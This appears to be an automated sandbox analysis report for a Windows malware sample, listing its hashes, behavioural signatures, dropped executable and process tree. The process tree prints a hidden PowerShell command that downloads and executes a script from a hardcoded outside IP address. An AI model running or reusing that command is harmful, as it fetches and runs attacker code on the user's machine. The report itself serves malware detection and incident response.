Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
23/05/2024, 18:58
Static task
static1
Behavioral task
behavioral1
Sample
ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe
Resource
win7-20240221-en
General
-
Target
ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe
-
Size
2.6MB
-
MD5
932a2b0f00ce7406a03590142d7418bc
-
SHA1
67b28f17cee2ca441ff511cab32c60e210baea55
-
SHA256
ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee
-
SHA512
0c16bd2b105bf9a1da98073e1d11e5d417f0cd1ba5c872b46ff64c793c8caaf212353e3ff21deea2c10e450d814d41b02c82f82616189aa25d96789f968a538c
-
SSDEEP
49152:t+UIsZarvwaSte+aMkkb1qE1o7XT9/14DM:3parvxue+alkjkXT9/14D
Malware Config
Extracted
http://222.186.141.207:8895/R29kTG9hZA==
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 392 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 392 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4396 Windows UP.exe -
resource yara_rule behavioral2/memory/4016-23-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-26-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-25-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-62-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-68-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-66-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-64-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-60-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-56-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-52-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-50-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-48-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-46-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-44-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-70-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-36-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-34-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-32-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-31-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-58-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-54-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-42-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-40-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-38-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-28-0x0000000010000000-0x000000001003E000-memory.dmp upx behavioral2/memory/4016-27-0x0000000010000000-0x000000001003E000-memory.dmp upx -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 392 powershell.exe 392 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 392 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 4396 Windows UP.exe 4396 Windows UP.exe 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4016 wrote to memory of 4804 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 82 PID 4016 wrote to memory of 4804 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 82 PID 4016 wrote to memory of 4804 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 82 PID 4016 wrote to memory of 4396 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 84 PID 4016 wrote to memory of 4396 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 84 PID 4016 wrote to memory of 4396 4016 ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe 84 PID 4804 wrote to memory of 392 4804 cmd.exe 85 PID 4804 wrote to memory of 392 4804 cmd.exe 85 PID 4804 wrote to memory of 392 4804 cmd.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe"C:\Users\Admin\AppData\Local\Temp\ae0dc28c73ac5b74fe1049204e4e1c8b46e9b605240da80ca515e974945352ee.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\cmd.execmd /c powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"2⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://222.186.141.207:8895/R29kTG9hZA=='))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
-
C:\ProgramData\ini\Windows UP.exe"C:\ProgramData\ini\Windows UP.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4396
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD5dc8792077ca599dfda04754132404c60
SHA1256c309a710b4c2c3820711f2cf7f483ae67320b
SHA256b2e8005c41bb19989cae0776ec087679ab49c91b5279d55b158e20473c657e16
SHA512d96542d0b06a1409bbf6c1088292c59b6fbdd098a5f867c20fc8f93db7e61e3f62eb548491960ae6db2da699a2058b02bb95a82b31ed74a77b5039ea44bde285
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82